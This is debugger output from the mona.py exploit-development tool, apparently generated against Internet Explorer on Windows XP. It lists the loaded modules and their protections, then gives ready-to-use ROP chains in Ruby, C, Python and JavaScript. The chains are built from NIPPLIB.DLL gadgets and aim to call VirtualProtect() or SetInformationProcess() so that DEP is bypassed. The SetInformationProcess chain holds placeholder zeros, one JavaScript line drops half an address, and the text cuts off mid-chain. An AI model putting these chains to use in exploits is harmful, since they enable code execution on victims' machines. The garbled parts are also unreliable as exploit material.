================================================================================
  Output generated by mona.py v2.0, rev 494 - WinDBG
  Corelan Team - https://www.corelan.be
================================================================================
  OS : xp, release 5.1.2600
  Process being debugged : IEXPLORE (pid 3248)
  Current mona arguments: rop -m nipplib.dll -cpb '\x00\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f'
================================================================================
  2015-02-03 21:09:15
================================================================================
----------------------------------------------------------------------------------------------------------------------------------
 Module info :
----------------------------------------------------------------------------------------------------------------------------------
 Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
----------------------------------------------------------------------------------------------------------------------------------
 0x5cb70000 | 0x5cb96000 | 0x00026000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [ShimEng.dll] (C:\WINDOWS\system32\ShimEng.dll)
 0x00c30000 | 0x016c1000 | 0x00a91000 | True   | True    | False |  False   | True   | 8.0.6001.18702 [IEFRAME.dll] (C:\WINDOWS\system32\IEFRAME.dll)
 0x6d3e0000 | 0x6d3f0000 | 0x00010000 | False  | True    | False |  False   | False  | 10.3.0.5 [jp2ssv.dll] (C:\Program Files\Java\jre7\bin\jp2ssv.dll)
 0x1a400000 | 0x1a532000 | 0x00132000 | False  | True    | False |  False   | True   | 8.0.6001.18702 [urlmon.dll] (C:\WINDOWS\system32\urlmon.dll)
 0x7e720000 | 0x7e7d0000 | 0x000b0000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [SXS.DLL] (C:\WINDOWS\system32\SXS.DLL)
 0x63580000 | 0x63b2c000 | 0x005ac000 | False  | True    | False |  False   | True   | 8.0.6001.18702 [mshtml.dll] (C:\WINDOWS\system32\mshtml.dll)
 0x72d20000 | 0x72d29000 | 0x00009000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [wdmaud.drv] (C:\WINDOWS\system32\wdmaud.drv)
 0x77b40000 | 0x77b62000 | 0x00022000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [apphelp.dll] (C:\WINDOWS\system32\apphelp.dll)
 0x7c420000 | 0x7c4a7000 | 0x00087000 | False  | True    | False |  False   | True   | 8.0.50727.762 [MSVCP80.dll] (C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCP80.dll)
 0x020e0000 | 0x023a5000 | 0x002c5000 | True   | True    | False |  False   | True   | 5.1.2600.5512 [xpsp2res.dll] (C:\WINDOWS\system32\xpsp2res.dll)
 0x7c800000 | 0x7c8f6000 | 0x000f6000 | False  | True    | False |  False   | True   | 5.1.2600.5781 [kernel32.dll] (C:\WINDOWS\system32\kernel32.dll)
 0x77c10000 | 0x77c68000 | 0x00058000 | False  | True    | False |  False   | True   | 7.0.2600.5512 [msvcrt.dll] (C:\WINDOWS\system32\msvcrt.dll)
 0x00400000 | 0x0049c000 | 0x0009c000 | False  | True    | False |  False   | False  | 8.0.6001.18702 [IEXPLORE.EXE] (C:\Program Files\Internet Explorer\IEXPLORE.EXE)
 0x742e0000 | 0x742f5000 | 0x00015000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [SPOOLSS.DLL] (C:\WINDOWS\system32\SPOOLSS.DLL)
 0x02970000 | 0x02999000 | 0x00029000 | True   | True    | False |  False   | True   | 3.10.349.0 [msls31.dll] (C:\WINDOWS\system32\msls31.dll)
 0x7c900000 | 0x7c9b2000 | 0x000b2000 | False  | True    | False |  False   | True   | 5.1.2600.5755 [ntdll.dll] (C:\WINDOWS\system32\ntdll.dll)
 0x76390000 | 0x763ad000 | 0x0001d000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [IMM32.DLL] (C:\WINDOWS\system32\IMM32.DLL)
 0x009c0000 | 0x009c6000 | 0x00006000 | True   | True    | False |  False   | False  | 8.0.6001.18702 [xpshims.dll] (C:\Program Files\Internet Explorer\xpshims.dll)
 0x036f0000 | 0x0373a000 | 0x0004a000 | True   | False   | False |  False   | True   | 5.5.2.0 [nipplibr.dll] (C:\WINDOWS\system32\iprint\nls\deu\nipplibr.dll)
 0x77f60000 | 0x77fd6000 | 0x00076000 | False  | True    | False |  False   | True   | 6.0.2900.5912 [SHLWAPI.dll] (C:\WINDOWS\system32\SHLWAPI.dll)
 0x025c0000 | 0x02600000 | 0x00040000 | True   | True    | False |  False   | False  | 8.0.6001.18702 [IEPROXY.DLL] (C:\Program Files\Internet Explorer\IEPROXY.DLL)
 0x78130000 | 0x781cb000 | 0x0009b000 | False  | True    | False |  False   | True   | 8.0.50727.762 [MSVCR80.dll] (C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_6b128700\MSVCR80.dll)
 0x5dca0000 | 0x5de88000 | 0x001e8000 | False  | True    | False |  False   | True   | 8.0.6001.18702 [iertutil.dll] (C:\WINDOWS\system32\iertutil.dll)
 0x77c00000 | 0x77c08000 | 0x00008000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [VERSION.dll] (C:\WINDOWS\system32\VERSION.dll)
 0x5c000000 | 0x5c189000 | 0x00189000 | False  | False   | False |  False   | True   | 5.5.2.0 [NIPPLIB.DLL] (C:\WINDOWS\system32\NIPPLIB.DLL)
 0x10000000 | 0x10011000 | 0x00011000 | False  | True    | False |  False   | False  | 9.5.0.270 [AcroIEHelperShim.dll] (C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll)
 0x76fd0000 | 0x7704f000 | 0x0007f000 | False  | True    | False |  False   | True   | 2001.12.4414.700 [CLBCATQ.DLL] (C:\WINDOWS\system32\CLBCATQ.DLL)
 0x77fe0000 | 0x77ff1000 | 0x00011000 | False  | True    | False |  False   | True   | 5.1.2600.5834 [Secur32.dll] (C:\WINDOWS\system32\Secur32.dll)
 0x75cf0000 | 0x75d81000 | 0x00091000 | False  | True    | False |  False   | True   | 6.0.2900.5512 [MLANG.dll] (C:\WINDOWS\system32\MLANG.dll)
 0x71aa0000 | 0x71aa8000 | 0x00008000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [WS2HELP.dll] (C:\WINDOWS\system32\WS2HELP.dll)
 0x76bf0000 | 0x76bfb000 | 0x0000b000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [PSAPI.DLL] (C:\WINDOWS\system32\PSAPI.DLL)
 0x769c0000 | 0x76a74000 | 0x000b4000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [USERENV.dll] (C:\WINDOWS\system32\USERENV.dll)
 0x71ab0000 | 0x71ac7000 | 0x00017000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [ws2_32.dll] (C:\WINDOWS\system32\ws2_32.dll)
 0x7e410000 | 0x7e4a1000 | 0x00091000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [USER32.dll] (C:\WINDOWS\system32\USER32.dll)
 0x72d10000 | 0x72d18000 | 0x00008000 | False  | False   | False |  False   | True   | 5.1.2600.0 [msacm32.drv] (C:\WINDOWS\system32\msacm32.drv)
 0x028e0000 | 0x028f0000 | 0x00010000 | True   | True    | False |  False   | False  | 9.5.0.270 [AcroIEHelper.dll] (C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll)
 0x71b20000 | 0x71b32000 | 0x00012000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [MPR.dll] (C:\WINDOWS\system32\MPR.dll)
 0x763b0000 | 0x763f9000 | 0x00049000 | False  | True    | False |  False   | True   | 6.0.2900.5512 [comdlg32.dll] (C:\WINDOWS\system32\comdlg32.dll)
 0x76e10000 | 0x76e35000 | 0x00025000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [adsldpc.dll] (C:\WINDOWS\system32\adsldpc.dll)
 0x76d40000 | 0x76d58000 | 0x00018000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [MPRAPI.dll] (C:\WINDOWS\system32\MPRAPI.dll)
 0x63380000 | 0x63434000 | 0x000b4000 | False  | True    | False |  False   | True   | 5.8.6001.18702 [jscript.dll] (C:\WINDOWS\system32\jscript.dll)
 0x76c90000 | 0x76cb8000 | 0x00028000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [IMAGEHLP.dll] (C:\WINDOWS\system32\IMAGEHLP.dll)
 0x76e80000 | 0x76e8e000 | 0x0000e000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [rtutils.dll] (C:\WINDOWS\system32\rtutils.dll)
 0x72ea0000 | 0x72f0f000 | 0x0006f000 | False  | True    | False |  False   | True   | 8.0.6001.18669 [ieapfltr.dll] (C:\WINDOWS\system32\ieapfltr.dll)
 0x76c30000 | 0x76c5e000 | 0x0002e000 | False  | True    | False |  False   | True   | 5.131.2600.5922 [WINTRUST.dll] (C:\WINDOWS\system32\WINTRUST.dll)
 0x77f10000 | 0x77f59000 | 0x00049000 | False  | True    | False |  False   | True   | 5.1.2600.5698 [GDI32.dll] (C:\WINDOWS\system32\GDI32.dll)
 0x5ad70000 | 0x5ada8000 | 0x00038000 | False  | True    | False |  False   | True   | 6.0.2900.5512 [uxtheme.dll] (C:\WINDOWS\system32\uxtheme.dll)
 0x746f0000 | 0x7471a000 | 0x0002a000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [msimtf.dll] (C:\WINDOWS\system32\msimtf.dll)
 0x77a80000 | 0x77b15000 | 0x00095000 | False  | True    | False |  False   | True   | 5.131.2600.5512 [CRYPT32.dll] (C:\WINDOWS\system32\CRYPT32.dll)
 0x5b860000 | 0x5b8b5000 | 0x00055000 | False  | True    | False |  False   | True   | 5.1.2600.5694 [NETAPI32.dll] (C:\WINDOWS\system32\NETAPI32.dll)
 0x7c9c0000 | 0x7d1d7000 | 0x00817000 | False  | True    | False |  False   | True   | 6.0.2900.5622 [SHELL32.dll] (C:\WINDOWS\system32\SHELL32.dll)
 0x77e70000 | 0x77f02000 | 0x00092000 | False  | True    | False |  False   | True   | 5.1.2600.5795 [RPCRT4.dll] (C:\WINDOWS\system32\RPCRT4.dll)
 0x76f20000 | 0x76f47000 | 0x00027000 | False  | True    | False |  False   | True   | 5.1.2600.5625 [DNSAPI.dll] (C:\WINDOWS\system32\DNSAPI.dll)
 0x76b20000 | 0x76b31000 | 0x00011000 | False  | True    | False |  False   | True   | 3.5.2284.2 [ATL.DLL] (C:\WINDOWS\system32\ATL.DLL)
 0x774e0000 | 0x7761d000 | 0x0013d000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [ole32.dll] (C:\WINDOWS\system32\ole32.dll)
 0x773d0000 | 0x774d3000 | 0x00103000 | False  | True    | False |  False   | True   | 6.0.2900.5512 [comctl32.dll] (C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll)
 0x72d10000 | 0x72d18000 | 0x00008000 | False  | False   | False |  False   | True   | 5.1.2600.0 [MSACM32.dll] (C:\WINDOWS\system32\msacm32.drv)
 0x63000000 | 0x630e6000 | 0x000e6000 | False  | True    | False |  False   | True   | 8.0.6001.18702 [WININET.dll] (C:\WINDOWS\system32\WININET.dll)
 0x77050000 | 0x77115000 | 0x000c5000 | False  | True    | False |  False   | True   | 2001.12.4414.700 [COMRes.dll] (C:\WINDOWS\system32\COMRes.dll)
 0x755c0000 | 0x755ee000 | 0x0002e000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [msctfime.ime] (C:\WINDOWS\system32\msctfime.ime)
 0x74720000 | 0x7476c000 | 0x0004c000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [MSCTF.dll] (C:\WINDOWS\system32\MSCTF.dll)
 0x73000000 | 0x73026000 | 0x00026000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [WINSPOOL.DRV] (C:\WINDOWS\system32\WINSPOOL.DRV)
 0x76d60000 | 0x76d79000 | 0x00019000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [iphlpapi.dll] (C:\WINDOWS\system32\iphlpapi.dll)
 0x76b40000 | 0x76b6d000 | 0x0002d000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [WINMM.dll] (C:\WINDOWS\system32\WINMM.dll)
 0x77bd0000 | 0x77bd7000 | 0x00007000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [midimap.dll] (C:\WINDOWS\system32\midimap.dll)
 0x71bf0000 | 0x71c03000 | 0x00013000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [SAMLIB.dll] (C:\WINDOWS\system32\SAMLIB.dll)
 0x77b20000 | 0x77b32000 | 0x00012000 | False  | True    | False |  False   | True   | 5.1.2600.5875 [MSASN1.dll] (C:\WINDOWS\system32\MSASN1.dll)
 0x035b0000 | 0x0362b000 | 0x0007b000 | True   | False   | False |  False   | True   | 5.5.2.0 [ienipp.ocx] (C:\WINDOWS\system32\ienipp.ocx)
 0x71590000 | 0x71609000 | 0x00079000 | False  | True    | False |  False   | True   | 5.1.2600.5906 [AcLayers.DLL] (C:\WINDOWS\AppPatch\AcLayers.DLL)
 0x76f60000 | 0x76f8c000 | 0x0002c000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [WLDAP32.dll] (C:\WINDOWS\system32\WLDAP32.dll)
 0x71d40000 | 0x71d5b000 | 0x0001b000 | False  | True    | False |  False   | True   | 6.0.2900.5512 [ACTXPRXY.DLL] (C:\WINDOWS\system32\ACTXPRXY.DLL)
 0x77cc0000 | 0x77cf2000 | 0x00032000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [ACTIVEDS.dll] (C:\WINDOWS\system32\ACTIVEDS.dll)
 0x77dd0000 | 0x77e6b000 | 0x0009b000 | False  | True    | False |  False   | True   | 5.1.2600.5755 [ADVAPI32.dll] (C:\WINDOWS\system32\ADVAPI32.dll)
 0x77920000 | 0x77a13000 | 0x000f3000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [SETUPAPI.dll] (C:\WINDOWS\system32\SETUPAPI.dll)
 0x78aa0000 | 0x78b5e000 | 0x000be000 | False  | True    | False |  False   | False  | 10.0.30319.1 [MSVCR100.dll] (C:\Program Files\Java\jre7\bin\MSVCR100.dll)
 0x5edd0000 | 0x5ede7000 | 0x00017000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [OLEPRO32.DLL] (C:\WINDOWS\system32\OLEPRO32.DLL)
 0x02710000 | 0x02719000 | 0x00009000 | True   | True    | False |  False   | True   | 6.0.5441.0 [Normaliz.dll] (C:\WINDOWS\system32\Normaliz.dll)
 0x77120000 | 0x771ab000 | 0x0008b000 | False  | True    | False |  False   | True   | 5.1.2600.5512 [OLEAUT32.dll] (C:\WINDOWS\system32\OLEAUT32.dll)
----------------------------------------------------------------------------------------------------------------------------------

################################################################################

Register setup for VirtualProtect() :
--------------------------------------------
 EAX = NOP (0x90909090)
 ECX = lpOldProtect (ptr to W address)
 EDX = NewProtect (0x40)
 EBX = dwSize
 ESP = lPAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualProtect()
 EDI = ROP NOP (RETN)
 --- alternative chain ---
 EAX = tr to &VirtualProtect()
 ECX = lpOldProtect (ptr to W address)
 EDX = NewProtect (0x40)
 EBX = dwSize
 ESP = lPAddress (automatic)
 EBP = POP (skip 4 bytes)
 ESI = ptr to JMP [EAX]
 EDI = ROP NOP (RETN)
 + place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------


ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :
----------------------------------------------------------

*** [ Ruby ] ***

  def create_rop_chain()

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = 
    [
      0x5c0bcf4f,  # POP EBP # RETN [NIPPLIB.DLL] 
      0x5c0bcf4f,  # skip 4 bytes [NIPPLIB.DLL]
      0x5c0529f8,  # POP EAX # RETN [NIPPLIB.DLL] 
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x5c080337,  # NEG EAX # RETN [NIPPLIB.DLL] 
      0x5c08d949,  # XCHG EAX,EBX # RETN [NIPPLIB.DLL] 
      0x5c06dc78,  # POP EAX # RETN [NIPPLIB.DLL] 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x5c09cfd3,  # NEG EAX # RETN [NIPPLIB.DLL] 
      0x5c06a72a,  # XCHG EAX,EDX # RETN 0x00 [NIPPLIB.DLL] 
      0x5c0b6cfd,  # POP ECX # RETN [NIPPLIB.DLL] 
      0x5c128f4e,  # &Writable location [NIPPLIB.DLL]
      0x5c09c8ce,  # POP EDI # RETN [NIPPLIB.DLL] 
      0x5c075142,  # RETN (ROP NOP) [NIPPLIB.DLL]
      0x5c0766bf,  # POP ESI # RETN [NIPPLIB.DLL] 
      0x5c01bbc0,  # JMP [EAX] [NIPPLIB.DLL]
      0x5c06dc78,  # POP EAX # RETN [NIPPLIB.DLL] 
      0x7e72121c,  # ptr to &VirtualProtect() (skipped module criteria, check if pointer is reliable !) [IAT SXS.DLL]
      0x5c0839ac,  # PUSHAD # RETN [NIPPLIB.DLL] 
      0x5c09beeb,  # ptr to 'push esp # ret ' [NIPPLIB.DLL]
    ].flatten.pack("V*")

    return rop_gadgets

  end


  # Call the ROP chain generator inside the 'exploit' function :


  rop_chain = create_rop_chain()



*** [ C ] ***

  #define CREATE_ROP_CHAIN(name, ...) \
    int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
    unsigned int name[name##_length / sizeof(unsigned int)]; \
    create_rop_chain(name, ##__VA_ARGS__);

  int create_rop_chain(unsigned int *buf, unsigned int )
  {
    // rop chain generated with mona.py - www.corelan.be
    unsigned int rop_gadgets[] = {
      0x5c0bcf4f,  // POP EBP // RETN [NIPPLIB.DLL] 
      0x5c0bcf4f,  // skip 4 bytes [NIPPLIB.DLL]
      0x5c0529f8,  // POP EAX // RETN [NIPPLIB.DLL] 
      0xfffffdff,  // Value to negate, will become 0x00000201
      0x5c080337,  // NEG EAX // RETN [NIPPLIB.DLL] 
      0x5c08d949,  // XCHG EAX,EBX // RETN [NIPPLIB.DLL] 
      0x5c06dc78,  // POP EAX // RETN [NIPPLIB.DLL] 
      0xffffffc0,  // Value to negate, will become 0x00000040
      0x5c09cfd3,  // NEG EAX // RETN [NIPPLIB.DLL] 
      0x5c06a72a,  // XCHG EAX,EDX // RETN 0x00 [NIPPLIB.DLL] 
      0x5c0b6cfd,  // POP ECX // RETN [NIPPLIB.DLL] 
      0x5c128f4e,  // &Writable location [NIPPLIB.DLL]
      0x5c09c8ce,  // POP EDI // RETN [NIPPLIB.DLL] 
      0x5c075142,  // RETN (ROP NOP) [NIPPLIB.DLL]
      0x5c0766bf,  // POP ESI // RETN [NIPPLIB.DLL] 
      0x5c01bbc0,  // JMP [EAX] [NIPPLIB.DLL]
      0x5c06dc78,  // POP EAX // RETN [NIPPLIB.DLL] 
      0x7e72121c,  // ptr to &VirtualProtect() (skipped module criteria, check if pointer is reliable !) [IAT SXS.DLL]
      0x5c0839ac,  // PUSHAD // RETN [NIPPLIB.DLL] 
      0x5c09beeb,  // ptr to 'push esp // ret ' [NIPPLIB.DLL]
    };
    if(buf != NULL) {
      memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
    };
    return sizeof(rop_gadgets);
  }

  // use the 'rop_chain' variable after this call, it's just an unsigned int[]
  CREATE_ROP_CHAIN(rop_chain, );
  // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
  // unsigned int rop_chain[256];
  // int rop_chain_length = create_rop_chain(rop_chain, );

*** [ Python ] ***

  def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x5c0bcf4f,  # POP EBP # RETN [NIPPLIB.DLL] 
      0x5c0bcf4f,  # skip 4 bytes [NIPPLIB.DLL]
      0x5c0529f8,  # POP EAX # RETN [NIPPLIB.DLL] 
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x5c080337,  # NEG EAX # RETN [NIPPLIB.DLL] 
      0x5c08d949,  # XCHG EAX,EBX # RETN [NIPPLIB.DLL] 
      0x5c06dc78,  # POP EAX # RETN [NIPPLIB.DLL] 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x5c09cfd3,  # NEG EAX # RETN [NIPPLIB.DLL] 
      0x5c06a72a,  # XCHG EAX,EDX # RETN 0x00 [NIPPLIB.DLL] 
      0x5c0b6cfd,  # POP ECX # RETN [NIPPLIB.DLL] 
      0x5c128f4e,  # &Writable location [NIPPLIB.DLL]
      0x5c09c8ce,  # POP EDI # RETN [NIPPLIB.DLL] 
      0x5c075142,  # RETN (ROP NOP) [NIPPLIB.DLL]
      0x5c0766bf,  # POP ESI # RETN [NIPPLIB.DLL] 
      0x5c01bbc0,  # JMP [EAX] [NIPPLIB.DLL]
      0x5c06dc78,  # POP EAX # RETN [NIPPLIB.DLL] 
      0x7e72121c,  # ptr to &VirtualProtect() (skipped module criteria, check if pointer is reliable !) [IAT SXS.DLL]
      0x5c0839ac,  # PUSHAD # RETN [NIPPLIB.DLL] 
      0x5c09beeb,  # ptr to 'push esp # ret ' [NIPPLIB.DLL]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

  rop_chain = create_rop_chain()



*** [ JavaScript ] ***

  //rop chain generated with mona.py - www.corelan.be
  rop_gadgets = unescape(
    "%ucf4f%u5c0b" + // 0x5c0bcf4f : ,# POP EBP # RETN [NIPPLIB.DLL] 
    "%ucf4f%u5c0b" + // 0x5c0bcf4f : ,# skip 4 bytes [NIPPLIB.DLL]
    "%u29f8%u5c05" + // 0x5c0529f8 : ,# POP EAX # RETN [NIPPLIB.DLL] 
    "%ufdff%uffff" + // 0xfffffdff : ,# Value to negate, will become 0x00000201
    "%u0337%u5c08" + // 0x5c080337 : ,# NEG EAX # RETN [NIPPLIB.DLL] 
    "%ud949%u5c08" + // 0x5c08d949 : ,# XCHG EAX,EBX # RETN [NIPPLIB.DLL] 
    "%udc78%u5c06" + // 0x5c06dc78 : ,# POP EAX # RETN [NIPPLIB.DLL] 
    "%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040
    "%ucfd3%u5c09" + // 0x5c09cfd3 : ,# NEG EAX # RETN [NIPPLIB.DLL] 
    "%ua72a%u5c06" + // 0x5c06a72a : ,# XCHG EAX,EDX # RETN 0x00 [NIPPLIB.DLL] 
    "%u6cfd%u5c0b" + // 0x5c0b6cfd : ,# POP ECX # RETN [NIPPLIB.DLL] 
    "%u8f4e%u5c12" + // 0x5c128f4e : ,# &Writable location [NIPPLIB.DLL]
    "%uc8ce%u5c09" + // 0x5c09c8ce : ,# POP EDI # RETN [NIPPLIB.DLL] 
    "%u5142%u5c07" + // 0x5c075142 : ,# RETN (ROP NOP) [NIPPLIB.DLL]
    "%u66bf%u5c07" + // 0x5c0766bf : ,# POP ESI # RETN [NIPPLIB.DLL] 
    "%ubbc0%u5c01" + // 0x5c01bbc0 : ,# JMP [EAX] [NIPPLIB.DLL]
    "%udc78%u5c06" + // 0x5c06dc78 : ,# POP EAX # RETN [NIPPLIB.DLL] 
    "%u121c%u7e72" + // 0x7e72121c : ,# ptr to &VirtualProtect() (skipped module criteria, check if pointer is reliable !) [IAT SXS.DLL]
    "%u39ac%u5c08" + // 0x5c0839ac : ,# PUSHAD # RETN [NIPPLIB.DLL] 
    "%ubeeb%u5c09" + // 0x5c09beeb : ,# ptr to 'push esp # ret ' [NIPPLIB.DLL]
    ""); //  : 


--------------------------------------------------------------------------------------------------


################################################################################

Register setup for SetInformationProcess() :
--------------------------------------------
 EAX = SizeOf(ExecuteFlags) (0x4)
 ECX = &ExecuteFlags (ptr to 0x00000002)
 EDX = ProcessExecuteFlags (0x22)
 EBX = NtCurrentProcess (0xffffffff)
 ESP = ReturnTo (automatic)
 EBP = ptr to NtSetInformationProcess()
 ESI = <not used>
 EDI = ROP NOP (4 byte stackpivot)
--------------------------------------------


ROP Chain for SetInformationProcess() [(XP/2003 Server only)] :
---------------------------------------------------------------

*** [ Ruby ] ***

  def create_rop_chain()

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = 
    [
      0x00000000,  # [-] Unable to find gadgets to pickup the desired API pointer into ebp
      0x00000000,  # [-] Unable to find ptr to &SetInformationProcess()
      0x5c06dc78,  # POP EAX # RETN [NIPPLIB.DLL] 
      0xffffffde,  # Value to negate, will become 0x00000022
      0x5c0abde6,  # NEG EAX # RETN [NIPPLIB.DLL] 
      0x5c06a72a,  # XCHG EAX,EDX # RETN 0x00 [NIPPLIB.DLL] 
      0x5c09f354,  # POP ECX # RETN [NIPPLIB.DLL] 
      0x5c0c08cc,  # &0x00000002 [NIPPLIB.DLL]
      0x5c080419,  # POP EBX # RETN [NIPPLIB.DLL] 
      0xffffffff,  # 0xffffffff-> ebx
      0x5c06dc78,  # POP EAX # RETN [NIPPLIB.DLL] 
      0xfffffffc,  # Value to negate, will become 0x00000004
      0x5c080337,  # NEG EAX # RETN [NIPPLIB.DLL] 
      0x5c066ae2,  # POP EDI # RETN [NIPPLIB.DLL] 
      0x5c066ae2,  # skip 4 bytes [NIPPLIB.DLL]
      0x5c0839e1,  # PUSHAD # RETN [NIPPLIB.DLL] 
    ].flatten.pack("V*")

    return rop_gadgets

  end


  # Call the ROP chain generator inside the 'exploit' function :


  rop_chain = create_rop_chain()



*** [ C ] ***

  #define CREATE_ROP_CHAIN(name, ...) \
    int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
    unsigned int name[name##_length / sizeof(unsigned int)]; \
    create_rop_chain(name, ##__VA_ARGS__);

  int create_rop_chain(unsigned int *buf, unsigned int )
  {
    // rop chain generated with mona.py - www.corelan.be
    unsigned int rop_gadgets[] = {
      0x00000000,  // [-] Unable to find gadgets to pickup the desired API pointer into ebp
      0x00000000,  // [-] Unable to find ptr to &SetInformationProcess()
      0x5c06dc78,  // POP EAX // RETN [NIPPLIB.DLL] 
      0xffffffde,  // Value to negate, will become 0x00000022
      0x5c0abde6,  // NEG EAX // RETN [NIPPLIB.DLL] 
      0x5c06a72a,  // XCHG EAX,EDX // RETN 0x00 [NIPPLIB.DLL] 
      0x5c09f354,  // POP ECX // RETN [NIPPLIB.DLL] 
      0x5c0c08cc,  // &0x00000002 [NIPPLIB.DLL]
      0x5c080419,  // POP EBX // RETN [NIPPLIB.DLL] 
      0xffffffff,  // 0xffffffff-> ebx
      0x5c06dc78,  // POP EAX // RETN [NIPPLIB.DLL] 
      0xfffffffc,  // Value to negate, will become 0x00000004
      0x5c080337,  // NEG EAX // RETN [NIPPLIB.DLL] 
      0x5c066ae2,  // POP EDI // RETN [NIPPLIB.DLL] 
      0x5c066ae2,  // skip 4 bytes [NIPPLIB.DLL]
      0x5c0839e1,  // PUSHAD // RETN [NIPPLIB.DLL] 
    };
    if(buf != NULL) {
      memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
    };
    return sizeof(rop_gadgets);
  }

  // use the 'rop_chain' variable after this call, it's just an unsigned int[]
  CREATE_ROP_CHAIN(rop_chain, );
  // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
  // unsigned int rop_chain[256];
  // int rop_chain_length = create_rop_chain(rop_chain, );

*** [ Python ] ***

  def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x00000000,  # [-] Unable to find gadgets to pickup the desired API pointer into ebp
      0x00000000,  # [-] Unable to find ptr to &SetInformationProcess()
      0x5c06dc78,  # POP EAX # RETN [NIPPLIB.DLL] 
      0xffffffde,  # Value to negate, will become 0x00000022
      0x5c0abde6,  # NEG EAX # RETN [NIPPLIB.DLL] 
      0x5c06a72a,  # XCHG EAX,EDX # RETN 0x00 [NIPPLIB.DLL] 
      0x5c09f354,  # POP ECX # RETN [NIPPLIB.DLL] 
      0x5c0c08cc,  # &0x00000002 [NIPPLIB.DLL]
      0x5c080419,  # POP EBX # RETN [NIPPLIB.DLL] 
      0xffffffff,  # 0xffffffff-> ebx
      0x5c06dc78,  # POP EAX # RETN [NIPPLIB.DLL] 
      0xfffffffc,  # Value to negate, will become 0x00000004
      0x5c080337,  # NEG EAX # RETN [NIPPLIB.DLL] 
      0x5c066ae2,  # POP EDI # RETN [NIPPLIB.DLL] 
      0x5c066ae2,  # skip 4 bytes [NIPPLIB.DLL]
      0x5c0839e1,  # PUSHAD # RETN [NIPPLIB.DLL] 
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

  rop_chain = create_rop_chain()



*** [ JavaScript ] ***

  //rop chain generated with mona.py - www.corelan.be
  rop_gadgets = unescape(
    "%u0000%u0000" + // 0x00000000 : ,# [-] Unable to find gadgets to pickup the desired API pointer into ebp
    "%u0000%u0000" + // 0x00000000 : ,# [-] Unable to find ptr to &SetInformationProcess()
    "%udc78%u5c06" + // 0x5c06dc78 : ,# POP EAX # RETN [NIPPLIB.DLL] 
    "%uffde%uffff" + // 0xffffffde : ,# Value to negate, will become 0x00000022
    "%ubde6" + // 0x5c0abde6 : ,# NEG EAX # RETN [NIPPLIB.DLL] 
    "%ua72a%u5c06" + // 0x5c06a72a : ,# XCHG EAX,EDX # RETN 0x00 [NIPPLIB.DLL] 
    "%uf354%u5c09" + // 0x5c09f354 : ,# POP ECX # RETN [NIPPLIB.DLL] 
    "%u08cc%u5c0c" + // 0x5c0c08cc : ,# &0x00000002 [NIPPLIB.DLL]
    "%u0419%u5c08" + // 0x5c080419 : ,# POP EBX # RETN [NIPPLIB.DLL] 
    "%uffff%uffff" + // 0xffffffff : ,# 0xffffffff-> ebx
    "%udc78%u5c06" + // 0x5c06dc78 : ,# POP EAX # RETN [NIPPLIB.DLL] 
    "%ufffc%uffff" + // 0xfffffffc : ,# Value to negate, will become 0x00000004
